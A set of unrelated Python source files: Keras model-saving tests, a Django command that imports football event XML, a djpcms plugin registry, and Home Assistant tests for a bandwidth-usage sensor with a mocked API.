keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
# This layer name will make the `layers_name` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own but because h5py converts
# the list of layer names into numpy array, which uses the same
# amout of memory for every item, it increases the memory
# requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of layer names.
with h5py.File(fname, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_model_with_long_weights_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weights_name`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**14)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of weight names.
with h5py.File(fname, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
@test_util.run_deprecated_v1
def test_model_saving_to_pre_created_h5py_file(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
inputs = keras.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
outputs = keras.layers.Dense(3)(x)
model = keras.Model(inputs, outputs)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.Adam(),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
with h5py.File(fname, mode='r+') as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test non-default options in h5
with h5py.File('_', driver='core',
backing_store=False) as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_constant_initializer_with_numpy(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
2,
input_shape=(3,),
kernel_initializer=keras.initializers.Constant(np.ones((3, 2)))))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
class SubclassedModel(training.Model):
def __init__(self):
super(SubclassedModel, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.x_layer(a))
class TestWeightSavingAndLoadingTFFormat(test.TestCase):
def test_keras_optimizer_warning(self):
graph = ops.Graph()
with graph.as_default(), self.session(graph):
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer=optimizers.Adam(), metrics=['acc'])
model._make_train_function()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
with test.mock.patch.object(logging, 'warning') as mock_log:
model.save_weights(prefix)
self.assertRegexpMatches(
str(mock_log.call_args),
'Keras optimizer')
@test_util.run_in_graph_and_eager_modes
def test_tensorflow_format_overwrite(self):
with self.cached_session() as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
model(x) # pylint: disable=not-callable
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
model.save_weights(prefix, save_format='tensorflow', overwrite=True)
with self.assertRaises(EOFError):
# Indirectly tests that the user is prompted
model.save_weights(prefix, save_format='tensorflow', overwrite=False)
def test_no_default_session(self):
with ops.Graph().as_default():
self.assertFalse(ops.get_default_session())
data = np.random.random((1000, 32)).astype(np.float32)
labels = np.random.random((1000, 10)).astype(np.float32)
model = keras.models.Sequential([
keras.layers.Dense(10, activation='softmax'),
keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=training_module.RMSPropOptimizer(0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels)
fname = os.path.join(self.get_temp_dir(), 'weights', 'ckpt')
model.save_weights(fname)
model.load_weights(fname)
def test_no_graph_pollution(self):
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.session(graph) as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
model(x) # pylint: disable=not-callable
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
op_count = len(graph.get_operations())
model.save_weights(prefix, save_format='tensorflow')
self.assertEqual(len(graph.get_operations()), op_count)
model.load_weights(prefix)
op_count = len(graph.get_operations())
model.load_weights(prefix)
self.assertEqual(len(graph.get_operations()), op_count)
def _weight_loading_test_template(self, make_model_fn):
with self.cached_session():
model = make_model_fn()
model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
train_x = np.random.random((3, 2))
train_y = np.random.random((3,))
x = constant_op.constant(train_x, dtype=dtypes.float32)
model.train_on_batch(train_x, train_y)
model.save_weights(prefix, save_format='tf')
ref_y_before_train = model.predict(train_x)
model.train_on_batch(train_x, train_y)
ref_y_after_train = model.predict(train_x)
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
model.load_weights(prefix)
self.assertAllClose(ref_y_before_train, self.evaluate(model(x)))
# Test restore-on-create if this is a subclassed Model (graph Networks
# will have already created their variables).
load_model = make_model_fn()
load_model.load_weights(prefix)
self.assertAllClose(
ref_y_before_train,
self.evaluate(load_model(x)))
load_model = make_model_fn()
load_model.load_weights(prefix)
# We need to run some of the restore ops for predict(), but not all
# variables have been created yet (optimizer slot variables). Tests
# incremental restore.
load_model.predict(train_x)
load_model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
load_model.train_on_batch(train_x, train_y)
self.assertAllClose(ref_y_after_train, self.evaluate(load_model(x)))
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model(self):
def _make_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
return keras.models.Model(a, b)
self._weight_loading_test_template(_make_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model(self):
self._weight_loading_test_template(SubclassedModel)
def _new_layer_weight_loading_test_template(
self, first_model_fn, second_model_fn, restore_init_fn):
with self.cached_session() as session:
model = first_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix)
self.assertEqual(
prefix,
checkpoint_management.latest_checkpoint(temp_dir))
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
second_model = second_model_fn()
second_model.load_weights(prefix)
second_model(x)
self.evaluate(restore_init_fn(second_model))
second_model.save_weights(prefix)
# Check that the second model's checkpoint loads into the original model
model.load_weights(prefix)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dense(1, name='second')(x)
b = keras.layers.Dense(3, name='secondjr')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.layers[-1].variables]
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_no_weight_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dropout(rate=0.1)(x)
b = keras.layers.Dense(1, name='second')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
del restore_model # unused
return []
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model_added_layer(self):
class SubclassedModelRestore(training.Model):
def __init__(self):
super(SubclassedModelRestore, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.y_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.y_layer(self.x_layer(a)))
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.y_layer.variables]
self._new_layer_weight_loading_test_template(
SubclassedModel, SubclassedModelRestore,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_incompatible_checkpoint(self):
save_path = trackable.Checkpoint().save(
os.path.join(self.get_temp_dir(), 'ckpt'))
m = keras.Model()
with self.assertRaisesRegexp(AssertionError, 'Nothing to load'):
m.load_weights(save_path)
m.dense = keras.layers.Dense(2)
m.dense(constant_op.constant([[1.]]))
with self.assertRaisesRegexp(
AssertionError, 'Nothing except the root object matched'):
m.load_weights(save_path)
@test_util.run_in_graph_and_eager_modes
def test_directory_passed(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'ckpt/')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_relative_path(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
os.chdir(self.get_temp_dir())
prefix = 'ackpt'
self.evaluate(v.assign(42.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt.index'))
self.evaluate(v.assign(1.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
prefix = 'subdir/ackpt'
self.evaluate(v.assign(43.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('subdir/ackpt.index'))
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(43., self.evaluate(v))
prefix = 'ackpt/'
self.evaluate(v.assign(44.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt/.index'))
self.evaluate(v.assign(3.))
m.load_weights(prefix)
self.assertEqual(44., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_nonexistant_prefix_directory(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'bckpt')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
if __name__ == '__main__':
test.main()
| |
### Read from F24 files and construct EventStatistic models
import utils.xmls as xml_utils
import datetime
import os
import time
from teams.models import Team
from games.models import Game
from players.models import Player
from eventstatistics.models import EventStatistic
from qualifiers.models import Qualifier
from django.core.management.base import BaseCommand
def is_tag(xml_obj, tag):
"""Return true if the XML object is the Tag"""
return xml_obj.tag == tag
def is_tag_and_type(xml_obj, tag, type):
"""Return true if the XML object is of the right Tag and Type"""
return xml_obj.tag == tag and xml_utils.get_attrib_if_exists(xml_obj,"Type") == type
class Command(BaseCommand):
"""
Sample usage:
python manage.py build_eventstatistic_table_ALL_FILES \
--dry_run \
--partial_load \
--data_filepath=data/f24
"""
help = "Populate game table"
def add_arguments(self, parser):
"""Add custom CLI arguments"""
parser.add_argument(
"--dry_run",
action="store_true",
dest="dry_run",
default=False,
help="Don't save and just print teams",
)
parser.add_argument(
"--partial_load",
action="store_true",
dest="partial_load",
default=False,
help="Loading partial F24 files?",
)
parser.add_argument(
"--data_filepath",
dest="data_filepath",
type=str,
required=True,
help="Filepath containing all data files to load",
)
def handle(self, *args, **options):
print "AJS Run at " + str(datetime.datetime.now())
script_start = time.time()
data_filepath = options["data_filepath"]
is_dry_run = options["dry_run"]
is_partial_load = options["partial_load"]
print "Importing EventStatistics and Qualifiers from %s" % (data_filepath)
if is_dry_run:
print "This is a dry run and will not save any data"
if is_partial_load:
print "This is knowingly a partial load of some files; which means many more hits to the DB"
event_pull_count = 0
event_saved_count = 0
q_pull_count = 0
q_saved_count = 0
file_count = 0
for root_dir, sub_dirs, filenames in os.walk(data_filepath):
for f in filenames:
temp = time.time()
file_start = time.time()
file_count += 1
file_event_saved_count = 0
file_q_saved_count = 0
xml_file = os.path.join(data_filepath, f)
#Open up F24 and find root: <Games>
xml_data_root = xml_utils.get_root_from_file(xml_file)
#Find <Game>
xml_Game = xml_utils.get_tag(xml_data_root, "Game")
game_uuid = xml_utils.get_attrib_if_exists(xml_Game, "id")
db_Game = Game.objects.get(uuid="f"+game_uuid)
game_datetime = xml_utils.get_attrib_if_exists(xml_Game, "game_date")
game_datetime = datetime.datetime.strptime(game_datetime,'%Y-%m-%dT%H:%M:%S')
temp = time.time()
if is_partial_load:
existing_event_stats = EventStatistic.objects.filter(game=db_Game).filter(team=db_Team)
existing_stats = [str(i.uuid) for i in existing_event_stats]
temp = time.time()
#Iterate through <Game> and only pay attention to <Event>s
for xml_Event in xml_utils.get_children(xml_Game):
if is_tag(xml_Event, "Event") == False:
continue #skip if not the relevant <Event> child
event_uuid = xml_utils.get_attrib_if_exists(xml_Event, "id")
event_id = xml_utils.get_attrib_if_exists(xml_Event, "event_id")
player_id = xml_utils.get_attrib_if_exists(xml_Event, "player_id")
if player_id:
db_Player = Player.objects.get(uuid="p"+player_id)
else:
db_Player = None
team_id = xml_utils.get_attrib_if_exists(xml_Event, "team_id")
db_Team = Team.objects.get(uuid="t"+team_id)
type_id = xml_utils.get_attrib_if_exists(xml_Event, "type_id")
period_id = xml_utils.get_attrib_if_exists(xml_Event, "period_id")
minute = xml_utils.get_attrib_if_exists(xml_Event, "min")
second = xml_utils.get_attrib_if_exists(xml_Event, "sec")
outcome = xml_utils.get_attrib_if_exists(xml_Event, "outcome")
x_coord = xml_utils.get_attrib_if_exists(xml_Event, "x")
y_coord = xml_utils.get_attrib_if_exists(xml_Event, "y")
timestamp = xml_utils.get_attrib_if_exists(xml_Event, "timestamp")
timestamp = datetime.datetime.strptime(timestamp,'%Y-%m-%dT%H:%M:%S.%f')
time_delta = timestamp - game_datetime
relative_seconds = time_delta.total_seconds()
assist = xml_utils.get_attrib_if_exists(xml_Event, "assist")
if assist:
assist = True
else:
assist = False
keypass = xml_utils.get_attrib_if_exists(xml_Event, "keypass")
if keypass:
keypass = True
else:
keypass = False
temp = time.time()
new_event_statistic = EventStatistic(
uuid=event_uuid
,event_id=event_id
,game=db_Game
,player=db_Player
,team=db_Team
,type_id=type_id
,period_id=period_id
,minute=minute
,second=second
,outcome=outcome
,assist=assist
,keypass=keypass
,x=x_coord
,y=y_coord
,relative_seconds=relative_seconds
)
temp = time.time()
event_pull_count += 1
if is_dry_run == False:
if is_partial_load and new_event_statistic.uuid not in existing_stats:
new_event_statistic.save()
event_saved_count += 1
file_event_saved_count += 1
else:
new_event_statistic.save()
event_saved_count += 1
file_event_saved_count += 1
if is_partial_load:
existing_Q_stats = Qualifier.objects.filter(event_statistic=new_event_statistic)
existing_Qs = [str(i.uuid) for i in existing_Q_stats]
temp = time.time()
for xml_Qualifier in xml_utils.get_children(xml_Event):
if is_tag(xml_Qualifier, "Q") == False:
continue #skip if not the relevant <Q> child
q_uuid = xml_utils.get_attrib_if_exists(xml_Qualifier, "id")
qualifier_id = xml_utils.get_attrib_if_exists(xml_Qualifier, "qualifier_id")
value = xml_utils.get_attrib_if_exists(xml_Qualifier, "value")
temp = time.time()
new_qualifier = Qualifier(
event_statistic=new_event_statistic
,uuid=q_uuid
,qualifier_id=qualifier_id
,value=value
)
q_pull_count += 1
if is_dry_run == False:
if is_partial_load and new_event_statistic.uuid not in existing_Qs:
new_qualifier.save()
q_saved_count += 1
file_q_saved_count += 1
else:
new_qualifier.save()
q_saved_count += 1
file_q_saved_count += 1
temp = time.time()
file_end = time.time()
print "# files parsed = %s; saved EventStats = %s; saved Qs = %s; file time = %s secs; closing %s..." \
% (str(file_count), file_event_saved_count, file_q_saved_count, (file_end - file_start), f)
print "\n# event-statistics pulled from files = %s" % (str(event_pull_count))
print "# event-statistics actually saved to DB = %s" % (str(event_saved_count))
print "\n# qualifiers pulled from files = %s" % (str(q_pull_count))
print "# qualifiers actually saved to DB = %s" % (str(q_saved_count))
script_end = time.time()
print "\n%s minutes to complete script" % ((script_end - script_start) / 60)
| |
import os
import logging
import json
from djpcms import forms
from djpcms.forms import form_kwargs
from djpcms.utils import force_str
from djpcms.utils.text import capfirst, nicename
from djpcms.utils.formjson import form2json
_plugin_dictionary = {}
_wrapper_dictionary = {}
def ordered_generator(di):
cmp = lambda x,y : 1 if x.description > y.description else -1
def _():
return ((c.name,c.description) for c in sorted(di.values(),cmp))
return _
plugingenerator = ordered_generator(_plugin_dictionary)
wrappergenerator = ordered_generator(_wrapper_dictionary)
get_plugin = lambda name, default = None: _plugin_dictionary.get(name,default)
get_wrapper = lambda name, default = None: _wrapper_dictionary.get(name,default)
def register_application(app, name = None, description = None):
'''Register an application view as a plugin
* *app* is an instance of an :class:`djpcms.views.appview.AppViewBase`
* *name* name for this plugin'''
global _plugin_dictionary
if hasattr(app,'get_plugin'):
p = app.get_plugin()
else:
p = ApplicationPlugin(app)
#media = p.media + app.get_media()
#p.__class__.media = media
#p.register()
class DJPpluginMetaBase(forms.MediaDefiningClass):
'''
Just a metaclass to differentiate plugins from other calsses
'''
def __new__(cls, name, bases, attrs):
new_class = super(DJPpluginMetaBase, cls).__new__
if attrs.pop('virtual',None) or not attrs.pop('auto_register',True):
return new_class(cls, name, bases, attrs)
pname = attrs.get('name',None)
if pname is None:
pname = name
pname = pname.lower()
descr = attrs.get('description',None)
if not descr:
descr = pname
if pname != '':
descr = nicename(descr)
attrs['name'] = pname
attrs['description'] = descr
pcls = new_class(cls, name, bases, attrs)
pcls()._register()
return pcls
class DJPpluginMeta(DJPpluginMetaBase):
'''
Just a metaclass to differentiate plugins from other classes
'''
class DJPwrapperMeta(DJPpluginMetaBase):
'''
Just a metaclass to differentiate wrapper from other classes
'''
class DJPwrapper(object):
'''Class responsible for wrapping :ref:`djpcms plugins <plugins-index>`.
'''
__metaclass__ = DJPwrapperMeta
virtual = True
name = None
'''Unique name. If not provided the class name will be used. Default ``None``.'''
form_layout = None
def wrap(self, djp, cblock, html):
'''Wrap content for block and return safe HTML.
This function should be implemented by derived classes.
* *djp* instance of :class:`djpcms.views.response.DjpResponse`.
* *cblock* instance of :class:'djpcms.models.BlockContent`.
* *html* safe unicode string of inner HTML.'''
return html if html else ''
def __call__(self, djp, cblock, html):
name = cblock.plugin_name
id = cblock.htmlid()
head = '<div id="{0}" class="djpcms-block-element plugin-{1}">\n'.format(id,name)
inner = self.wrap(djp, cblock, html)
return head + inner + '\n</div>'
def _register(self):
global _wrapper_dictionary
_wrapper_dictionary[self.name] = self
class DJPplugin(object):
'''Base class for Plugins. These classes are used to display contents on a ``djpcms`` powered site.
The basics:
* A Plugin is dynamic application.
* It is rendered within a :class:`DJPwrapper` and each :class:`DJPwrapper` displays a plugin.
* It can define style and javascript to include in the page, in a static way (as a ``meta`` property of the class) or in a dynamic way by member functions.
* It can have parameters to control its behaviour.'''
__metaclass__ = DJPpluginMeta
virtual = True
'''If set to true, the class won't be registered with the plugin's dictionary. Default ``False``.'''
name = None
'''Unique name. If not provided the class name will be used. Default ``None``.'''
description = None
'''A short description to display in forms.'''
form = None
'''Form class for editing the plugin parameters. Default ``None``, the plugin has no arguments.'''
form_withrequest = False
'''Equivalent to :attr:`djpcms.views.appsite.ModelApplication.form_withrequest`. If set to ``True``,
the ``request`` instance is passed to the :attr:`form` constructor. Default is ``False``.'''
permission = 'authenticated'
#storage = _plugin_dictionary
#URL = None
def js(self, **kwargs):
'''Function which can be used to inject javascript dynamically.'''
return None
def css(self):
'''Function which can be used to inject css dynamically.'''
return None
def arguments(self, args):
try:
kwargs = json.loads(args)
if isinstance(kwargs,dict):
rargs = {}
for k,v in kwargs.items():
rargs[str(k)] = v
return self.processargs(rargs)
else:
return {}
except:
return {}
def processargs(self, kwargs):
'''You can use this hook to perform pre-processing on plugin parameters if :attr:`form` is set.
By default do nothing.
'''
return kwargs
def __call__(self, djp, args = None, wrapper = None, prefix = None):
return self.render(djp, wrapper, prefix, **self.arguments(args))
def edit(self, djp, args = None, **kwargs):
kwargs.update(**self.arguments(args))
return self.edit_form(djp, **kwargs)
def edit_form(self, djp, **kwargs):
'''Returns the form used to edit the plugin **content**. Most plugins don't need to implement this
functions but some do. Check
the :class:`djpcms.plugins.text.Text` for example. By default it returns ``None``.'''
return None
def render(self, djp, wrapper, prefix, **kwargs):
'''Render the plugin. It returns a safe string to be included in the HTML page.
This is the function plugins need to implement.
* *djp* instance of :class:`djpcms.views.response.DjpResponse`.
* *wrapper* :class:`DJPwrapper` instance which wraps the plugin.
* *prefix* a prefix string or ``None`` to use for forms within the plugin.
* *kwargs* plugin specific key-valued arguments.'''
return ''
def save(self, pform):
'''Save the form plugin'''
return form2json(pform)
def get_form(self, djp, args = None, withdata = True):
'''Return an instance of a :attr:`form` or `None`. Used to edit the plugin when in editing mode.
Usually, there is no need to override this function. If your plugin needs input parameters when editing, simple set the
:attr:`form` attribute.
'''
if self.form:
initial = self.arguments(args) or None
return self.form(**form_kwargs(request = djp.request,
initial = initial,
withrequest = self.form_withrequest,
withdata = withdata,
own_view = djp.own_view()))
#def response(self, request, *bits):
# raise http.Http404
def _register(self):
global _plugin_dictionary
_plugin_dictionary[self.name] = self
def __eq__(self, other):
if isinstance(other,DJPplugin):
return self.name == other.name
return False
class EmptyPlugin(DJPplugin):
'''
This is the empty plugin. It render nothing
'''
name = ''
description = '--------------------'
class ThisPlugin(DJPplugin):
'''Current view plugin. This plugin render the current view
only if it is an instance of :class:`djpcms.views.appview.AppViewBase`.
For example if the current view is a :class:`djpcms.views.appview.SearchView`,
the plugin will display the search view for that application.
'''
name = 'this'
description = 'Current View'
def render(self, djp, wrapper, prefix, **kwargs):
djp.wrapper = wrapper
djp.prefix = prefix
return djp.view.render(djp)
class ApplicationPlugin(DJPplugin):
'''Plugin formed by :class:`djpcms.views.appview.AppViewBase` classes
which have the :attr:`djpcms.views.appview.AppViewBase.isplugin` attribute
set to ``True``.
For example, lets say an application as a :class:`djpcms.views.appview.AddView` view
which is registered to be a plugin, than it will be managed by this plugin.'''
auto_register = False
def __init__(self, app, name = None, description = None):
global _plugin_dictionary
self.app = app
self.form = app.plugin_form
if not name:
name = '%s-%s' % (app.appmodel.name,app.name)
if not description:
description = app.description or name
self.name = name
self.description = nicename(description)
_plugin_dictionary[self.name] = self
def render(self, djp, wrapper, prefix, **kwargs):
#kwargs may be an input from a possible plugin form
app = self.app
request = djp.request
html = u''
if app.has_permission(request):
if djp.view != app or kwargs:
args = djp.kwargs.copy()
args.update(kwargs)
t_djp = self.app(djp.request, **args)
else:
t_djp = djp
t_djp.wrapper = wrapper
t_djp.prefix = prefix
html = self.app.render(t_djp)
# Add media. It must be after having called render!!
if djp != t_djp:
djp.media += t_djp.media
return html
class SimpleWrap(DJPwrapper):
name = 'simple no-tags'
default_content_wrapper = SimpleWrap()
| |
"""Tests for the Start.ca sensor platform."""
import asyncio
from homeassistant.bootstrap import async_setup_component
from homeassistant.components.sensor.startca import StartcaData
from homeassistant.helpers.aiohttp_client import async_get_clientsession
@asyncio.coroutine
def test_capped_setup(hass, aioclient_mock):
"""Test the default setup."""
config = {'platform': 'startca',
'api_key': 'NOTAKEY',
'total_bandwidth': 400,
'monitored_variables': [
'usage',
'usage_gb',
'limit',
'used_download',
'used_upload',
'used_total',
'grace_download',
'grace_upload',
'grace_total',
'total_download',
'total_upload',
'used_remaining']}
result = '<?xml version="1.0" encoding="ISO-8859-15"?>'\
'<usage>'\
'<version>1.1</version>'\
'<total> <!-- total actual usage -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</total>'\
'<used> <!-- part of usage that counts against quota -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</used>'\
'<grace> <!-- part of usage that is free -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</grace>'\
'</usage>'
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
text=result)
yield from async_setup_component(hass, 'sensor', {'sensor': config})
state = hass.states.get('sensor.start_ca_usage_ratio')
assert state.attributes.get('unit_of_measurement') == '%'
assert state.state == '76.24'
state = hass.states.get('sensor.start_ca_usage')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_data_limit')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '400'
state = hass.states.get('sensor.start_ca_used_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_used_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_used_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '311.43'
state = hass.states.get('sensor.start_ca_grace_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_grace_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_grace_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '311.43'
state = hass.states.get('sensor.start_ca_total_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_total_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_remaining')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '95.05'
@asyncio.coroutine
def test_unlimited_setup(hass, aioclient_mock):
"""Test the default setup."""
config = {'platform': 'startca',
'api_key': 'NOTAKEY',
'total_bandwidth': 0,
'monitored_variables': [
'usage',
'usage_gb',
'limit',
'used_download',
'used_upload',
'used_total',
'grace_download',
'grace_upload',
'grace_total',
'total_download',
'total_upload',
'used_remaining']}
result = '<?xml version="1.0" encoding="ISO-8859-15"?>'\
'<usage>'\
'<version>1.1</version>'\
'<total> <!-- total actual usage -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</total>'\
'<used> <!-- part of usage that counts against quota -->'\
'<download>0</download>'\
'<upload>0</upload>'\
'</used>'\
'<grace> <!-- part of usage that is free -->'\
'<download>304946829777</download>'\
'<upload>6480700153</upload>'\
'</grace>'\
'</usage>'
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
text=result)
yield from async_setup_component(hass, 'sensor', {'sensor': config})
state = hass.states.get('sensor.start_ca_usage_ratio')
assert state.attributes.get('unit_of_measurement') == '%'
assert state.state == '0'
state = hass.states.get('sensor.start_ca_usage')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
